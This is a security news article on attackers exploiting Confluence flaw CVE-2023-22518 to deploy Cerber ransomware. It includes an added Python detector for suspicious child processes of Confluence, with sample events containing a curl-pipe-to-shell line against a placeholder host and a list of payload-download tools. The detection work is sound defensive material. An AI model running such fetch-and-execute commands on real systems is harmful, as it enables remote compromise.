The critical improper authorization vulnerability in Atlassian Confluence Server and Data Center that emerged last week is attracting the attention of a variety of attackers, including some that are attempting to deploy the Cerber ransomware.
When Atlassian warned of the vulnerability in Confluence on Oct. 31, there were not yet any reports of active exploitation. But that changed quickly once information about the bug became public. Within a couple of days of the initial advisory, researchers began noticing a variety of exploitation attempts against the vulnerability (CVE-2023-22518), which affects all versions of the Confluence Server and Data Center products.
Over the weekend, researchers from Rapid7 began observing attackers trying to exploit the bug on both Windows and Linux machines.
“As of November 5, 2023, Rapid7 Managed Detection and Response (MDR) is observing exploitation of Atlassian Confluence in multiple customer environments, including for ransomware deployment. We have confirmed that at least some of the exploits are targeting CVE-2023-22518, an improper authorization vulnerability affecting Confluence Data Center and Confluence Server,” Rapid7 said in a post Monday.
“The process execution chain, for the most part, is consistent across multiple environments, indicating possible mass exploitation of vulnerable internet-facing Atlassian Confluence servers.”
In several instances, Rapid7 saw attackers download a malicious payload from a remote server after successful exploitation, and then deploy the Cerber ransomware on the compromised machine.
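The pattern described above (a Confluence process that, after exploitation, spawns a shell or download utility to fetch a payload from a remote server) is the kind of thing a process-creation heuristic can catch regardless of the specific exploit. The following is an added example, not code from the article or from Rapid7: a small Python checker that walks process-creation events and flags any shell or download tool whose parent (or grandparent, via a shell) is the Confluence Java process. The event schema, the `SAMPLE_EVENTS` below and the `http://example.invalid/...` URL are constructed for the example; the assumption that Confluence is identifiable as a `java` process whose command line mentions "confluence" should be adjusted to the local install layout.

```python
"""
Added example (not from the article or Rapid7): flag post-exploitation style
process chains where a Confluence Java process spawns a shell or a download
utility. Feed it process-creation events from EDR/auditd/Sysmon; the event
schema and sample data here are constructed for the example.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str
    user: str


# Utilities commonly used to fetch a payload; suspicious as children of a web app.
DOWNLOAD_TOOLS = {"curl", "wget", "certutil.exe", "powershell.exe", "bitsadmin.exe"}
SHELLS = {"sh", "bash", "dash", "cmd.exe"}


def basename(path: str) -> str:
    """Return the file name from a POSIX or Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def is_confluence(ev: ProcEvent) -> bool:
    """Assumption: Confluence runs as a Java process whose command line
    mentions 'confluence' (install directory or main class)."""
    return basename(ev.image).lower() in {"java", "java.exe"} and "confluence" in ev.cmdline.lower()


def find_suspicious_children(events: Iterable[ProcEvent]) -> List[ProcEvent]:
    """Return events for shells/download tools whose parent is Confluence,
    or download tools whose parent is a shell spawned by Confluence."""
    events = list(events)
    by_pid: Dict[Tuple[str, int], ProcEvent] = {(e.host, e.pid): e for e in events}
    hits: List[ProcEvent] = []
    for ev in events:
        parent = by_pid.get((ev.host, ev.ppid))
        if parent is None:
            continue
        name = basename(ev.image).lower()
        # Direct child: confluence -> sh / curl / ...
        if is_confluence(parent) and name in (DOWNLOAD_TOOLS | SHELLS):
            hits.append(ev)
            continue
        # Grandchild via shell: confluence -> sh -> curl
        if basename(parent.image).lower() in SHELLS and name in DOWNLOAD_TOOLS:
            grandparent = by_pid.get((parent.host, parent.ppid))
            if grandparent is not None and is_confluence(grandparent):
                hits.append(ev)
    return hits


# Constructed sample events: host "web1" shows the suspicious chain,
# host "web2" shows an admin running curl from an interactive shell (benign).
SAMPLE_EVENTS = [
    ProcEvent("web1", 100, 1, "/usr/lib/jvm/bin/java",
              "java -classpath /opt/atlassian/confluence/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap",
              "confluence"),
    ProcEvent("web1", 200, 100, "/bin/bash", "bash -c 'curl -s http://example.invalid/p | sh'", "confluence"),
    ProcEvent("web1", 201, 200, "/usr/bin/curl", "curl -s http://example.invalid/p", "confluence"),
    ProcEvent("web2", 100, 1, "/usr/lib/jvm/bin/java",
              "java -classpath /opt/atlassian/confluence/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap",
              "confluence"),
    ProcEvent("web2", 300, 1, "/bin/bash", "bash", "admin"),
    ProcEvent("web2", 301, 300, "/usr/bin/curl", "curl -O https://example.invalid/update.tgz", "admin"),
]


if __name__ == "__main__":
    for hit in find_suspicious_children(SAMPLE_EVENTS):
        print(f"[{hit.host}] pid={hit.pid} ppid={hit.ppid} user={hit.user} {hit.cmdline}")
```

Two events on `web1` are flagged (the shell spawned by Confluence and the `curl` it launched), while the administrator's `curl` on `web2` is not, because its ancestry never reaches the Confluence process. Extending the tool lists and the `is_confluence` check to match the local environment is the main tuning a defender would do.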
Atlassian has released updates to fix the vulnerability in all of the affected versions of Confluence Server and Data Center, and organizations should update immediately, given the active attacks.